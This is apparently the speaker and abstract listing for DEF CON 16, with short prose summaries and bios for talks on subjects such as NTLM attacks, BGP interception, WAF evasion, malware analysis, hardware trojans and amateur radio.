Fyodor authored the open source Nmap Security Scanner in 1997 and continues to coordinate its development. He also maintains the Insecure.Org, Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has authored seminal papers on stealth port scanning, remote operating system detection, version detection, and the IPID Idle Scan. He is a founding member of the Honeynet project and co-author of the books "Know Your Enemy: Honeynets" and "Stealing the Network: How to Own a Continent". His newest book, Nmap Network Scanning, is due for release this year. Fyodor is President of Computer Professionals for Social Responsibility (CPSR), which has been promoting free speech, privacy, and useful technology since 1981. Fyodor loves Defcon, and has been attending for more than a decade. He previously presented at Defcon in 1998, 2002, and 2005.

Journey to the center of the HP28


Travis Goodspeed
Security Researcher

In 1990, a wire-bound book was published in Paris by the title of <<Voyage au centre de la HP28 c/s>>. It presents a very thorough account of the inner workings of the Hewlett Packard 28 series of graphing calculators. Designed before the days of prepackaged microprocessors, the series uses the Saturn architecture, which HP designed in-house. This architecture is very different from today's homogeneous RISC chips, with registers of 1, 4, 12, 16, 20, and 64 bits in width. The fundamental unit of addressing is the nibble, rather than the byte. Floats are represented as binary-coded decimal, and a fundamental object in the operating system is an algebraic expression.

This architecture is still used, albeit in emulation, in the modern HP50g. With this talk, I intend to call attention to a fascinating, professional, and well-documented feat of reverse engineering. Using little more than their ingenuity and an Apple ][e, Paul Courbis and Sebastien Lalande reverse engineered a black box calculator into a real computer, one which became user-programmable in machine language as a result. More than that, they documented the hack in such exquisite detail that their book is not just a fascinating read, but also veritable holy scripture for anyone trying to write custom software for this machine.

Expect a thorough review, in English, of the contents of the book. This is not a sales pitch; electronic copies of both the translation and the original are free to all interested readers. Topics include the datatypes of the computer algebra system, hacking an upgrade into the memory bus, bootstrapping an assembler, writing in machine language by tables, and adding an I/O port for software backups.

Travis Goodspeed works at the Extreme Measurement Communications Center of the DOE's Oak Ridge National Laboratory. He has spoken at ToorCon 9 and the Texas Instruments Developer's Conference regarding stack overflow exploits for the MSP430-based Wireless Sensor Networks. Having demonstrated that such attacks are possible, his present research is aimed at porting defense techniques, such as ASLR and code-auditing, to this platform. For the past year, he has been translating <<Voyage au centre de la HP28 c/s>>, a fascinating work of francophone reverse engineering, into English.

Making the DEFCON 16 Badge


Joe "Kingpin" Grand

For the third year in a row, Kingpin has had the honor of designing the DEFCON Badge. No longer just a boring piece of passive material, the badge is now a full-featured, active electronic product. If you're up early enough and interested in details of the entire development process of the badge, from initial concept drawings to prototype electronics to completed units, and want to hear stories of the trials and tribulations that come with designing and manufacturing, be sure to come to this talk.

Joe "Kingpin" Grand is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of big business, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

BSODomizer


Joe "Kingpin" Grand

Zoz
Robotics Engineer

We like hardware and we like messing with people. BSODomizer lets us do both. BSODomizer is a small Propeller-based electronic device that interfaces between a VGA output device (laptop or desktop) and a VGA monitor and will flash images at random time intervals. (Surprise Goatse!) Or display your favorite BSOD, causing the confused user to turn off their machine over and over again. Customization for different modes is configurable via on-board DIP switches.

We'll bring you through the entire design and development process of the device and end with some never-before-seen footage of poor bastards taking the bait. Full schematics, firmware, circuit board layout, and bill of materials will be released, so you can build your own BSODomizer. We'll have some bare PCBs and parts available for your instant gratification.

Don't let the name fool you. BSODomizer will do everything you've always wanted to do to your enemies (or friends) without the messy cleanup.

Joe "Kingpin" Grand is an electrical engineer, hardware hacker, and former member of L0pht Heavy Industries. Even with his distrust of big business, he has become a co-host of an upcoming engineering build show, Prototype This, for Discovery Channel. Sometimes he uses his real name, Joe Grand, and invents things for his company, Grand Idea Studio (www.grandideastudio.com). He's also the sole proprietor of Kingpin Empire, a hacker-inspired merchandise outfit (www.kingpinempire.com) that gives back to the community through charitable donations. He's designed the badge for DEFCON a few times, too.

Zoz is a robotics engineer, software hacker, pyrochemist and inveterate tinkerer. He got his PhD from the MIT Media Lab primarily so he could say "Trust me, I'm a doctor". After years in academia his love of media whoring could be held back no longer, so he is presently engaged in selling out by co-hosting Prototype This! for the Discovery Channel. He invents things for his own amusement, giving them designations like Funkenschnorkel, Luftwerfer and Schallfaust, and rarely associates his real name with anything.

Nail the Coffin Shut, NTLM is Dead


Kurt Grutzmacher
Security Researcher

Ever since SirDystic's SMBRelay release, the weaknesses of the NTLM protocol have been repeatedly shown. For over twenty years this protocol has been refined by Microsoft; it's time to let it go and stop supporting it within our networks.

This presentation will trace the history of the NTLM protocol and the various attacks that have befallen it over the past decade, the attempts at fixing them and why these fixes have not succeeded. I will show what I believe is the most significant attack against it and why the best solution is to migrate away from NTLM once and for all. Attendees will come away with a stronger understanding of the NTLM protocol and information to help them make the case to their Windows administrators, CIOs, CSOs and everybody else that there is a serious risk in keeping NTLM support around. A toolkit using the Metasploit Framework will be released that will help you show the risks in your enterprise.

Kurt Grutzmacher is a CISSP, but don't hold that against him. Lots of us have it because it keeps us employed. He was employed by the Federal Reserve System for 15 years, 5 of those in the official capacity of performing penetration tests and security reviews. Currently he works at Pacific Gas & Electric, one of the largest public utilities in the United States. Kurt has provided updates to the Metasploit Framework directly related to LM/NTLM support.

Satan is on my Friends list: Attacking Social Networks


Nathan Hamiel
Senior Consultant, Idea Information Security
Shawn Moyer
CTO, Agura Digital Security

Social Networking is shaping up to be the perfect storm... An implicit trust of those in one's network or social circle, a willingness to share information, little or no validation of identity, the ability to run arbitrary code (in the case of user-created apps) with minimal review, and a tag soup of client-side user-generated HTML (Hello? MySpace? 1998 called. It wants its markup vulns back). Yikes.

But enough about pwning the kid from homeroom who copied your calc homework. With the rise of business social networking sites, there are now thousands of public profiles with real names and titles of people working for major banks, the defense and aerospace industry, federal agencies, the US Senate... A target-rich and trusting environment for custom-tailored, laser-focused attacks.

Our talk will show the results of a series of public experiments aimed at pointing out the security and privacy ramifications of everyone's increasingly open, increasingly connected online personae and the interesting new attack vectors they've created.

Plus, we get to have some fun violating scads of EULAs, AUPs, and Terms of Service along the way.

K. THX FOR THE ADD!!1!

YOU RAWK.

Nathan Hamiel is a Senior Consultant for Idea Information Security and the founder of the Hexagon Security Group. He is also an Associate Professor at the University of Advancing Technology. Nathan has previously presented at numerous other conferences including DefCon, Shmoocon, Toorcon, and HOPE.

Nathan spent much of DefCon 15 without shoes and is planning ahead this year with a defense-in-depth approach that includes failover footwear. He has 1,936 people in his extended network, and finds that disturbing on a number of levels.

Shawn Moyer is CISO of Agura Digital Security, a web and network security consultancy. He has led security projects for major multinational corporations and the federal government, written for Information Security magazine, and spoken previously at BH and other conferences.

Shawn is currently working on a slash frantic adaptation of 2001: A Space Odyssey, told from the perspective of HAL 9000. He only accepts friend requests on Facebook if they include a DNA sample and a scanned copy of a valid driver's license or passport.

Advanced Software Armoring and Polymorphic Kung Fu


Nick Harbour
Principal Consultant, Mandiant

This presentation discusses the techniques employed by a new anti-reverse engineering tool named PE-Scrambler. Unlike a traditional executable packer, which simply compresses or encrypts the original executable, this tool has the ability to permanently modify the compiled code itself. With the ability to modify compiled programs at the instruction level, a vast array of anti-reverse engineering techniques are possible that would traditionally have been performed only by hand by seasoned hackers. In addition to thwarting a would-be reverse engineer, the tool has the ability to randomly modify code in a program in a fashion that keeps the functionality of the program intact. This is useful for modifying a program to defeat signature recognition algorithms such as those used in anti-virus programs. In this presentation we will discuss several of these anti-reverse engineering and polymorphic techniques in depth. A new technique and tool for detecting armored and packed binaries will also be discussed and demonstrated.

In addition to learning about two new security tools, attendees will learn state-of-the-art anti-disassembly and anti-debugging techniques. Attendees' eyes will be opened to the vast world of possibility that lies in the future for binary armoring, and they will develop a true contempt for the binary packers of today.

Nick Harbour is a Principal Consultant with Mandiant. He specializes in malware analysis and incident response as well as both offensive and defensive research and development. He also occasionally teaches malware analysis and reverse engineering. Nick's nine-year history in the security industry began as a researcher and forensic examiner at the DoD Computer Forensics Lab (DCFL), where he helped pioneer the field of computer forensics. Nick is a developer of open source software including, most notably, dcfldd, the popular forensic disk imaging tool; tcpxtract, a tool for carving files out of network traffic; and Mandiant Red Curtain, a tool for identifying malicious binaries. Nick is also a trained chef!

A Hacker Looks at 50


G. Mark Hardy
Founder, National Security Corporation

Take a trip back in time and discover what hacking was like in the pioneer days -- before the Internet, the PC, or even the Commodore 64 or TRS-80. The speaker started "exploring" computer systems in 1973, when the only law about hacking was the hacker ethic itself. Join a humorous reminiscence about what it was like building an Altair 8800, "discovering" the 2600 Hz tone, storing programs on punched cards, cracking bad crypto, and more. You'll find the people and principles haven't changed, only the speed of the hardware.

G. Mark Hardy CISSP, CISM, CISA, founded National Security Corporation in 1988. Since his first legitimate computer security job in 1976 for $2.10/hour, he has presented several hundred talks on information security. A perennial speaker at major security conferences, he's popular for his entertaining and informative style.

Playing with Web Application Firewalls


Wendel Guglielmetti Henrique
Penetration Test Analyst - Intruders Tiger Team Security

WAFs (Web Application Firewalls) are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web Service layers. Some WAFs look for certain 'attack signatures' to try to identify a specific attack that an intruder may be sending, while others look for abnormal behavior that doesn't fit the website's normal traffic patterns. Web Application Firewalls can be either software- or hardware-appliance-based and are installed in front of a webserver in an effort to shield it from incoming attacks.

Today WAF systems are considered the next-generation product for protecting websites against web hacking attacks; this presentation will show some techniques to detect, fingerprint and evade them. The speaker is affiliated with the Hackaholic team (http://hackaholic.org/) and works as a penetration tester for a Brazilian company called SecurityLabs in its Intruders Tiger Team division, one of the leading companies in this segment in Brazil, whose clients include government, the credit card industry, etc.

Wendel Guglielmetti Henrique has worked in IT since 1997, and for the last 7 years he has worked in the computer security field. He has found vulnerabilities in many software products, such as webmail systems, access points, Citrix Metaframe, etc. Some tools he wrote have been used as examples in articles in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine. During the last 3 years he has worked as a pen-tester.

War Ballooning - Kismet Wireless "Eye in the Sky"


Rick Hill
Senior Scientist, Tenacity Solutions, Inc.

Using a balloon as an aerial network surveillance platform, a.k.a. "WarBallooning", is an idea that evolved as a natural progression out of my rocket-based experiment @ Defcon 14 entitled "WarRocketing - Network Stumbling 50 sq. miles in < 60 seconds."

Interestingly, after my presentation in 2006, many in the wireless community discussed Balloon-based network discovery, notably CoWF & Slashdot. But, alas, like many great concepts in the scientific community, I found after much research (2008) that sadly to my (& Google's) knowledge no one has yet demonstrated WarBallooning ... Until Today!

My team (with the help of CoWF and DEFCON support staff) will demonstrate WarBallooning @Defcon 16 over the Riviera Hotel. Wardriving coverage is limited by obstructions such as trees, houses, and terrain. Our latest aerial platform (a 6 ft. helium balloon) does not have these limitations. Essentially, it was built to provide a superior line of sight, enabling the wardriver to rapidly recon a fairly large urban area.

Most notable feature: the Kismet "Eye in the Sky" actually beams live video back as the antenna targets various buildings (& networks).

The presentation will include details of all hardware hacks involved in the construction: WRT54G, Alchemy, Kismet Drone, & IP camera modifications. No prerequisite - only an interest in network stumbling and wireless technology.

Rick Hill, CISSP, works as an information security engineer for Tenacity Solutions, an IT consulting firm based in Reston, VA. Specializing in wireless security, his consulting gig involves C&A of govt. networks, site surveys, and performing network security assessments. Outside the day job, Rick enjoys boating, downhill skiing, and is an avid top-fuel drag racing fan... The speed fetish and love of technical hardware led naturally to his 2 favorite hobbies: High Power Rocketry & Netstumbling. (You may recall the "WarRocketing" talk that he presented two years ago @DEFCON 14.) Since that time, Rick has acquired much more professional netstumbling time, built several cool wireless devices, and now mixes his own rocket fuel. He's attending DEFCON 16 to check out the Wireless Village and to give a talk about his newest flying & hardware hacking adventure.

Under the iHood


Cameron Hotchkies
Vulnerability Analysis, TippingPoint

The market share for Apple devices has grown considerably over the past few years, but most reverse engineering topics still focus on Microsoft platforms. This talk will outline what is necessary to begin reversing software on OS X. This will include a rundown of the tools available to an Apple-based researcher, how Objective-C works and what it looks like in a binary, the basics of the Mach-O file format including the undocumented _OBJC section, and comparisons of Windows applications and their OS X counterparts.

Cameron Hotchkies has been a vulnerability researcher for TippingPoint's DVLabs since 2005. His day to day tasks include verification and analysis of Zero Day Initiative submissions, internal product security audits and a whole lot of reverse engineering. Prior to this he created the Absinthe/SQueaL automated SQL injection engine. He doesn't do web stuff anymore. Just reverse engineering. He holds a Bachelor's Degree in Software Engineering from McMaster University.

Race-2-Zero Unpacked


Simon Howard
Founder, Mince Research

Signature-based antivirus is dead; we want to show you just how dead it is. This presentation will detail our findings from running the Race-2-Zero contest during DC16. The contest involves teams or individuals being given a sample set of malicious programs to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses.

Topics covered will include:

Prize giving ceremony with celeb judging panel... prizes will be awarded for

Simon Howard has a penchant for black t-shirts, jeans and the lyrical stylings of Pantera, and has been touching computers ever since he can remember.

The Death of Cash:


The loss of anonymity and other dangers of the cash free society


Tony Howlett
President, Network Security Services

In this talk, we will discuss the pros and cons (mostly cons) of the cashless society and how it might endanger your privacy and civil liberties. This movement towards the elimination of cash has been picking up speed and has been mostly accepted by the populace as a huge convenience. We examine some reasons why this isn't such a good thing. We also look at legislation and laws in this area that give banks and the government unprecedented ability to track your financial transactions, cash and non-cash, with little or no cause. Finally, we cover some ways to avoid this scrutiny and protect your financial privacy.

Tony Howlett is President of Network Security Services, Inc. He was previously founder and CTO of InfoHighway Communications Corp., a leading ISP and CLEC. He is a frequent speaker and writer on security, the Internet and technology. He is the author of "Open Source Security Tools" as well as numerous articles for SysAdmin, Security Administrator, Windows Web Solutions, Windows IT Pro, Texas Computing and Computer Currents magazines. He is the co-host of the IT Security Blog "Fearless Security" on www.windowitpro.com. Type "Tony Howlett" into Google to get additional references.

Ham For Hackers- Take Back the Airwaves


JonM
Security Consultant & Amateur Radio Operator

Think amateur radio is all about dorks with walkie talkies? Think again. Amateur radio presents one of the last bastions for open radio experimentation. This talk will provide a brief introduction to amateur radio, explain the advantages of licensed spectrum for experimentation, and describe how to get involved in the leading edge of radio hacking.

JonM has been a licensed amateur radio operator for nearly a decade, but has never worn a radio on his belt. He holds an Amateur Extra license, the highest level granted in the US. When not mucking with the airwaves, he is a consultant specializing in application security.

TBA


Dan Kaminsky

Abstract to Come.

Bio to Come.

Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack


Anton Kapela
Security Researcher
Alex Pilosov
Security Researcher

In this presentation we're going to show Defcon how broken the Internet is, how helpless its users are without provider intervention, and how much apathy there is towards routing security.

With the method described in this talk, an attacker is able to gain full control and visibility of all IP packets heading towards an arbitrary destination prefix on the Internet. From the perspective of the victim's network, every inbound packet they receive will have first taken the 'scenic route' through the attacker's network before reaching the true destination.

The presentation will show attendees how (roughly) BGP works on the Internet, how and what providers do (or don't do) when interconnecting their networks, concluding with a discussion of the hijacking method and a live demo of 'man in the middled' traffic, in-flight, to an undisclosed destination, including countermeasures employed to further obscure the interception and ensure nearly perfect network transparency. Ettercap and others please stand aside - routed Internet hijacking has come of age!

Tkap (xam) & Pilo have presented at Defcon in the past but never before with this much spit & vinegar. Tkap usually talks about layer-1 and 2 stuff, like microwaves and data transport technologies. Pilo usually talks about optical transport systems and other layer-1 technologies, but he likes routing security too!

Demonstration of Hardware Trojans


Fouad Kiamilev
Professor, Electrical & Computer Engineering Dept., University of Delaware
Ryan Hoover
Graduate Student

Recent developments such as the FBI operation "Cisco Raider", which resulted in the discovery of 3,500 counterfeit Cisco network components, show the growing concern of the U.S. government about an electronic hardware equivalent of a "Trojan horse". In an electronic Trojan attack, extra circuitry is illicitly added to hardware during its manufacture. When triggered, the hardware Trojan performs an illicit action such as leaking secret information, allowing attackers clandestine access or control, or disabling or reducing functionality of the device. The growing use of programmable hardware devices (such as FPGAs) coupled with the increasing push to manufacture most electronic devices overseas means that our hardware is increasingly vulnerable to a Trojan attack from potential enemies.

This talk explores three possible methods that a hardware Trojan can use to leak secret information to the outside world: thermal, optical and radio. The hardware platform for our demonstration is a $149 Spartan-3E Starter Kit from XILINX. The application used in our demonstration is AES encryption. The objective of our Trojan is to illicitly leak the AES encryption keys once triggered.

In the thermal Trojan demo, we use an infrared camera to show how electronic components or exposed connector pins can be used to transmit illicit information thermally. In the optical Trojan demo, we use an optical-to-audio converter to show how a power-on LED can be used to transmit illicit information using signal frequencies undetectable by human eyes. Finally, in the radio Trojan demo, we use a radio receiver to show how an external connector can be used to transmit illicit information using AM radio transmission.

We finish our talk with a demonstration of an optical Trojan that leaks the encryption keys from a popular commercial network router (e.g. Cisco-Linksys WRT54GS).

Fouad Kiamilev is a professor in the Department of Electrical and Computer Engineering at the University of Delaware, where he directs a group of pirates who call themselves CVORG (which stands for CMOS VLSI Optimization Research Group). Fouad's main mission is to train students to become successful participants in the 21st century global economy. Since 1997, he has advised 12 Ph.D. students and 16 M.S. students. His graduates are employed by leading academic and industrial organizations in the United States. Fouad's research group, CVORG, specializes in custom hardware design for special applications. Present CVORG projects include a tester for a world-record-performance solar module, a 512x512 mid-wave and long-wave infrared display chip, and red-team hacking.

Ryan Hoover is a graduate student in professor Kiamilev's research group at the University of Delaware. Ryan completed his undergraduate Bachelor's degree in Computer Engineering there in May. Ryan minored in Computer Science and was one of two students who carried out the hardware Trojan research for the CVORG research group.

WhiteSpace: A Different Approach to JavaScript Obfuscation


Kolisar
Security Researcher

A different approach to JavaScript obfuscation will be presented. There are certain telltale indicators within an obfuscated JavaScript file which can be used for detection and protection. These signs occur in almost all obfuscated JavaScript and are easily detected via software and visual inspection. This different approach addresses these telltale indicators and provides a method of JavaScript obfuscation which hides these indicators from both automated and visual inspection.

Kolisar began writing software at the age of 10. His first computer was a Commodore Vic-20 with a whopping 3K of RAM. After high school and attending a technical school, he spent nearly 20 years as a software engineer writing CAM tools on UNIX and Windows, machine control and CRM software in C/C++, Java, JavaScript, VBScript, etc., and occasionally hand-optimizing assembly graphics code for performance. He is currently working in the security department of a medium-sized company, where he does security research, vulnerability and risk assessment, incident response and reverse engineering of malware.

Flux on: EAS (Emergency Alert System)


Matt "DCFLuX" Krick
Chief Engineer, New West Broadcasting Systems, Inc.

Discover the great mystery that is the Emergency Alert System: an elaborate way for the President of the United States to have his or her voice heard from every broadcast outlet at the same time. It can also perform other less important roles, such as letting the public know when their lives may be in danger from several naturally occurring and man-made events.

Matt Krick is Chief Engineer of New West Broadcasting Systems, Inc., operators of broadcast stations KGMN-FM, KZKE-FM, KYET AM and KKAX-LP. He has worked in the field of broadcasting since 1998, specializing in all aspects of broadcast engineering and video editing.

Career Mythbusters:


Separating Fact from Fiction in your Information Security Career


Lee Kushner
President, LJ Kushner and Associates, LLC
Mike Murray
Director of Neohapsis Labs

How long should my resume be? Do I really need to be a Manager? Do I need to attend business school? What certifications do I need? Does my title matter? Should I go after money or a cool job? What are the hot skills du jour? How do I use LinkedIn and Facebook? All of these questions are asked continually by Information Security professionals as they assess their current positions and determine which future opportunities align with their aspirations. Mike Murray and Lee Kushner return to the DefCon stage to answer these questions and dispel the prevailing myths that permeate the information security industry. Participants should leave the presentation with a better way to map out their own career and separate fact from fiction as they make decisions on how to pursue their ultimate career goals.

Lee Kushner is the President of LJ Kushner and Associates, LLC, an Executive Search firm dedicated exclusively to the Information Security industry and its professionals. Founded in 1999, LJ Kushner has successfully represented Fortune 2000 companies, Information Security Software Companies, Information Security Services Companies and large technology firms in enabling them to locate, attract, hire, and retain top level Information Security talent. He has been an invited speaker on the subjects of recruitment, retention, and industry trends at Information Security Conferences that include The Black Hat Briefings, The RSA Security Conference, Information Security Decisions, and a variety of ISSA Chapter Conferences.

Mike has spent his entire career in information security, starting in the late 90's as a penetration tester and vulnerability researcher up to his current position as the Director of Neohapsis Labs, where he heads up research, testing and analysis of security products. His years of experience as a vulnerability researcher and leader of research teams have convinced him that the most important system to focus on in information security is the human system.

His past few years, while continuing his work on the information security side with nCircle, LURHQ and Liberty Mutual, have been spent focusing extensively on the human side of security. His work helping other security professionals realize how to build a great career in security has been widely recognized, and his talks at major conferences about advanced social engineering techniques have been extremely well-reviewed. Mike's thoughts can be found on his blog at Episteme.ca, as well as his career site at ForgetTheParachute.com. He is the author of an upcoming book from No Starch Press on the intricacies and skills behind advanced social engineering and human exploitation.

Taking Back your Cellphone


Alexander Lash
Security Researcher

This presentation will cover a variety of topics of interest to anyone on a cellphone network in the US. I'm going to cover how to use your own backends for MMS and WAP access, unlock Bluetooth tethering, and circumvent some of the more obnoxious carrier restrictions.

Of course, the best part is baking your own firmware and running your own code. I'll provide an overview of the processes necessary to do so, a quick rundown of what you can expect from your carrier, a few tools and docs I've assembled to take a little pain out of the process, and all of the information you'll need to void your warranty with gusto and panache.

I'll provide several demonstrations you can follow along with on your own phone. The more restricted your phone is, the more mileage you'll get out of this talk --- and one lucky audience member will have their warranty voided live!

Alexander Lash has been tampering with cellular phones for ten years and putting together mobile applications for four. He's been putting together tools and docs while taking apart firmware and carrier systems, and takes personal offense at the idea of not being able to write code for his own hardware. (Pay no attention to the fact that he's left a trail of dead phones in his wake.)

Comparison of File Infection on Windows & Linux


lclee_vx
Founder F-13 Labs
lychan25

This talk documents the common file infection strategies that virus writers have used over the years, and compares Portable Executable (PE) file infection on the Windows platform with Executable and Linking Format (ELF) file infection on the Linux platform.

lclee_vx founded the Independent Virus Group F-13 Labs and is also an active virus coder in the EOF-Project. lclee_vx worked at a security company in Malaysia, serving for 4 years as a security consultant, and is now furthering studies at University Kebangsaan Malaysia as a Ph.D (Doctor of Philosophy) student, majoring in Antivirus Core Engine Design, while working as a Security Engineer at Computer Sciences Corporation (CSC).

lychan25 has been working in the cyber security industry for the past 2 years. lychan25 was previously a Security Consultant and is also a member of the Independent Virus Group F-13 Labs. lychan25 is now furthering studies at University Kebangsaan Malaysia as a Ph.D (Doctor of Philosophy) student, majoring in The Art of Packing/Unpacking.

Developments in Cisco IOS Forensics


"FX" Felix Lindner
Head of Recurity Labs

Attacks on network infrastructure are not a new field. However, the increasing default protections in common operating systems, platforms and development environments increase interest in the less protected infrastructure sector. Today, performing in-depth crash analysis or digital forensics is almost impossible on the most widely used routing platform.

This talk will show new developments in this sector and how a slightly adjusted network infrastructure configuration, together with new tools, finally makes it possible to tell crashed, attacked and backdoored routers apart. We walk through the known types of backdoors and shellcode for IOS, as well as their detection and the challenges in doing so.

"FX" Felix Lindner runs Recurity Labs. FX has over 10 years of experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research at Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics have included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Toying with Barcodes


"FX" Felix Lindner
Head of Recurity Labs

The talk focuses on 1D and 2D barcode applications with interference possibilities for the ordinary citizen. Ever wondered what is in these blocks of squares on postal packages, letters and tickets? Playing with them might have interesting effects, reaching from good old fun to theft and severe impact.

Barcodes have been around for ages, but most of the time were used as simple tags with a number. The rise of 2D barcodes started to put them into customer hands as authentication, authorization, payment method and other arbitrary data transport. The implicit trust in them is enormous. The talk gives a very quick intro into barcodes and then proceeds to review the contents of selected samples, including their usage in the real world. This is going to be fun, tool release included.

"FX" Felix Lindner runs Recurity Labs. FX has over 10 years of experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research at Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics have included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Malware RCE: Debuggers and Decryptor Development


Michael Ligh
Security Intelligence Engineer, iDEFENSE
Greg Sinclair
Rapid Response Engineer, VeriSign iDefense Rapid Response

This talk will focus on using a debugger to reverse engineer malware, with an emphasis on building decryption tools for credential recovery and command/control (c&c) inspection. Most modern-day trojans exhibit cryptography, or just home-grown obfuscation techniques, to prevent analysis of the stolen data or c&c protocol. This presentation will show how to script the debugger such that it leverages the trojan's own internal functions to decrypt information of the researcher's choice. The concepts will be demonstrated using current threats such as Feebs, Silent Banker, CoreFlood, Torpig/MBR, Kraken, Prg/Zeus, and Laqma.

Michael Hale Ligh is currently a security intelligence engineer at Verisign iDefense. He specializes in reverse engineering malware to provide in-depth analysis on capabilities, techniques, and decryption services. Michael obtained his master's in forensic computer investigation in 2004 and began providing Internet security services to financial institutions. He then gained interest in vulnerability research and has been credited with locating critical flaws in products such as Tumbleweed MailGate, Novell iMonitor/eDirectory, Symark PowerBroker, and F5 FirePass SSL VPN. Michael is a member of ZERT and has submitted winning entries in several malware related contests/challenges (SANS malware analysis, honeynet.org scan-of-the-month, and hacker challenge 2007). More of Michael's research is available online at www.mnin.org.

Greg Sinclair is a member of the Rapid Response Team that provides quick analysis and remediation techniques for malcode threats. Before joining Verisign, he worked for two years as a risk assessment security engineer for Healthcare Services Corporation (HCSC) in Chicago. At HCSC, Mr. Sinclair was responsible for analyzing production systems to find, and report on, unknown vulnerabilities before the vulnerabilities could be exploited by attackers. Mr. Sinclair specializes in reverse engineering applications to identify weaknesses and functionality. Prior to HCSC, he was the Head of IT Security for Strayer University for 3 years where he was responsible for developing and implementing IT security policies and protection mechanisms for Strayer's 45 campuses and corporate offices. Mr. Sinclair graduated from the University of North Carolina at Charlotte in 2001 with a BS in Computer Science.

Tuning Your Brain


Lyn

I can't tell you how often I'm listening to trance, goa or industrial when I'm coding. Often when we're stuck in a black hole, or just can't figure the problem out - the right music will help. Why does this work? It seems motivating, and it seems like we solve problems easier, and it seems to create a flow. Turns out, your brain is like a tuning fork. This talk will include a bit of biology - going over the basics of the brain structures, neurons, synapses and neurotransmitters, before getting to how music affects the brain, and how it helps us think.

Lyn is a web developer with a lot of time on her hands apparently. Her last EE experience was in the 5th grade, soldering boards for a $5 allowance. Oh, and she once was a research assistant and spent a lot of time attaching electrodes and preparing study participants for an EEG. Neurology has been her hobby since then.

Feed my Sat Monkey


Major Malfunction

In this confused rant^W^W talk, I will explain why the little green men are right, and also know how to party. I will show you some new toys. Shiny ones. Ones that go 'beep' and have flashy lights. You will like it, and I will be able to return to my home planet, mission accomplished, to the adulation of the triple-breasted masses and the reward of a grateful nation, followed by tea, medals and an inadequate state pension. Or I'll go to jail, whichever's quicker and/or cheaper.

OK, so you've sated your almost bottomless appetite for pr0n, obscure sports, late night poker and reality TV from countries you've never heard of and hopefully will never have to visit, so what else is there to do? What else is up there? (Apart from little green men, obviously... which are completely real, BTW... You should see some of the stuff we've got over in... oh, wait... I'm not supposed to talk about that... ) Where was I? Oh, yes... so I've got about a gazillion channels on a trillion satellites all bobbing about above me in space, but what are they all doing? How can I find anything interesting amongst all that background noise? Enough with the pr0n already! I want to see something cool! I want something nobody else is getting! I want what THE MAN's got!!! I want to be able to say to my friends "It just comes to you... This stuff just flies through the air... They send this information out - it's just beamed out all over the fuckin' place... All you have to do is know how to grab it... See, I know how to grab it.". And stuff like that. Yeah, baby. That would be HOT!

I'll also talk about something else. Something that'll probably get me whacked. So let's not talk about it yet, eh?

Miss Moneypenny says that Major's been a very naughty boy and can't come out to play today. Instead, he'll stay after skewl and write a thousand times "I am not a Secret Agent in the employ of Her Majesty's Secret Service, I do not take tea with Little Green Men, and my cover name is not Adam Laurie". His travels to security conferences around the world will be suspended until further notice, and Governments, Police, Military, Big Business, Little Business and Little Boys will no longer pay attention to his (strange) advice. When he claims to have a Secret Nuclear Bunker, his tuck will be confiscated and he will be sent to Matron for 'Special Treatment' (and we all know what THAT means, don't we? Yes, Matron). Now, heads down and get back to work, and no talking at the back there! I SAW that, Gates minor! Report to me after class...

Fear, Uncertainty and the Digital Armageddon


Morgan Marquis-Boire
Principal Consultant, Security-Assessment.com

We now live in an age where attacks on critical infrastructure will cause real world harm. An increasing global concern regarding cyber-terrorism reflects the problem critical infrastructure security poses for many large IT consulting companies, telecommunications providers, utilities and industrial companies.

SCADA networks are the foundation of the infrastructure which makes everyday life possible in most first world countries. This talk will provide an introduction to critical infrastructure environments and SCADA networks and the major differences that exist between understood security best practice and the protective measures regularly found (or not) in these networks.

The most common security mistakes will be covered, as will real world examples taken from penetration testing SCADA environments. Additionally, this talk will expose some of the potentially catastrophic consequences of a failure in a production SCADA environment. There will be an examination of the critical infrastructure hysteria which is currently in vogue and some consideration of steps which can be taken to secure these networks and prevent cyber-terrorism.

Morgan Marquis-Boire is a Principal Security Consultant at Security-Assessment.com where he specializes in Unix, forensics, and network security. He has a degree in philosophy and enjoys big kit and forgotten networks. Prior to his present incarnation as a corporate security guy, he's worked doing cluster computing, government infrastructure, Linux security appliances, and a security start-up in Japan. He has penned articles for magazines, written whitepapers, and presented at conferences around the world on a diverse range of subjects from SAN Security to Anonymous Network Technologies.

Sniffing Cable Modems


Guy Martin
Security Researcher

Cable modems are widely used these days for internet connections and other applications. This talk gives a detailed overview of this means of communication with a focus on its security.

